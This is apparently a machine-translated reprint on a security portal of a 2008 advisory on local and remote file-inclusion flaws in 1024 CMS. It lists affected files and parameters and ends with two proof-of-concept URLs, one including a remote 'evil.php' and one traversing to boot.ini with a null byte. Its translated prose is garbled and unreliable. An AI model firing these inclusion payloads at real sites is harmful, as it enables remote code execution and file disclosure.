Home | hacker invade | crack analyzes | hacker course | Exploit | encryption decipher | network management | System crack | the virus to be related | invades the examination | firewall
You are here: hacking technology > System crack > Content
Hot Articles
GeoVision Digital Video
Adobe Acrobat and the Re
Samba group_mapping.tdb/
The Sleuth Kit - UNIX-ba
Marvell 88W8361P-BEM1 ch
CS-Cart core / user.php
phpBB Small ShoutBox mod
Outlook Web Access for E
FlexCell Grid ActiveX co
PHP error_log bypasses t
Apple Bonjour for Window
nginx file type error pa
DedeCMS V5.5 Final GetWe
Details of PHP code exec
The VMware 2008-0014 ren
Recommend Articles
Mozilla the Firefox 2.0.
DC++ many long-distance
VLC the media player WAV
The Wireshark 1.0.1 edit
Wordpress XML-RPC connec
ServerView Web connectio
PCRE the pcre_compile.c
phpMyAdmin long-distance
Panda the ActiveScan lon
BlueZ the SDP load handl
1024 CMS many documents
WeFi journal file local
vBulletin adminlog.php r
Microsoft Windows DNS se
Adobe RoboHelp Server he
New Articles
DiY - brief loophole ana
Freefloat FTP Server ove
I can with Apache endeav
HP - UX NFS/ONCplus unkn
HP - UX FTPD remote deni
HP - UX DCE can send acr
HP - UX 'useradd' local
HP - UX swagentd remote
HP - UX Numbers local de
HP - UX System under the
HP - UX 'FTPD' unknown r
HP TCP/IP Services for c
From Solaris NFS pages f
From Solaris XScreenSave
Sun Solaris Auditing Ext
1024 CMS many documents contain the crack
  Add date: 07/12/2008   Publishing date: 07/12/2008   Hits: 120
Total 2 pages, Current page:1, Jump to page:
 

Issues the date: 2008-07-04
Renewal date: 2008-07-08

Is affected the system:
Treble Designs 1024 CMS 1.4.4 RFC
Treble Designs 1024 CMS 1.4.3
Description:
--------------------------------------------------------------------------------
BUGTRAQ ID: 30091

1024 are based on PHP and the MySQL content management system management system.

In 1024 CMS has many documents to contain the crack, the permission evil intention user revelation sensitive information or the invasion has crack's system.

1) themes/blog/layouts/standard.php, themes/default/layouts/standard.php, themes/portfolio/layouts/standard.php and in the themes/snazzy/layouts/standard.php document has not confirmed correctly to the page_include parameter input then uses in the included file, this possibly causes to contain local or the exterior resources random document. The success attack request has opened register_globals.

2) the many document correct confirmations then have not used in the included file to each kind of parameter's input, this possibly causes to contain the local resources the random document. The success attack request has been forbid magic_quotes_gpc. The following is the parameter which and the document affects.

theme_dir and page parameter:
themes/blog/layouts/standard.php
themes/default/layouts/standard.php
themes/portfolio/layouts/standard.php
themes/snazzy/layouts/standard.php
themes/blog/layouts/total.php
themes/default/layouts/total.php
themes/portfolio/layouts/total.php
themes/snazzy/layouts/total.php

lang parameter:
admin/lang/fr/reports/default.php
lang/en/moderator/default.php
lang/fr/moderator/default.php
lang/de/moderator/default.php


admin_theme_dir parameter:
admin/ops/admins/default.php
admin/ops/reports/ops/download.php
admin/ops/reports/ops/forum.php
admin/ops/reports/ops/news.php

theme_dir parameter:
pages/download/default/ops/add.php
pages/download/default/ops/edit.php
pages/download/default/ops/newest.php
pages/download/default/ops/search.php
pages/download/default/ops/top.php
pages/forum/default/content.php
themes/blog/layouts/basic_footer.php
themes/default/layouts/basic_footer.php
themes/portfolio/layouts/basic_footer.php
themes/snazzy/layouts/basic_footer.php
themes/blog/layouts/basic_header.php
themes/default/layouts/basic_header.php
themes/portfolio/layouts/basic_header.php
themes/snazzy/layouts/basic_header.php

page, page_include and theme_dir parameter:
themes/blog/layouts/print.php
themes/default/layouts/print.php
themes/portfolio/layouts/print.php
themes/snazzy/layouts/print.php

<* origin: Digital Security
 
  Link: http://marc.info/?l=bugtraq&m=121519055217560&w=2
*>

Test method:
--------------------------------------------------------------------------------

Warning

The following procedure (method) possibly has the aggressivity, only supplies the safe research and teaching. The user risk is proud!

http://www.example.com/ [installdir]/themes/blog/layouts/standard.php? page_include= http://www.example.com/evil.php
http://www.example.com/ [installdir]/themes/default/layouts/standard.php? theme_dir=. /. /. /. /. /. /. /. /. /. /. /. /. /boot.ini%00

 

Other pages: : 1 * 2 * Next>>
Prev:BlueZ the SDP load handles many buffer overflow crack Next:WeFi journal file local information revelation crack

Comment:

Category: Home > System crack
Home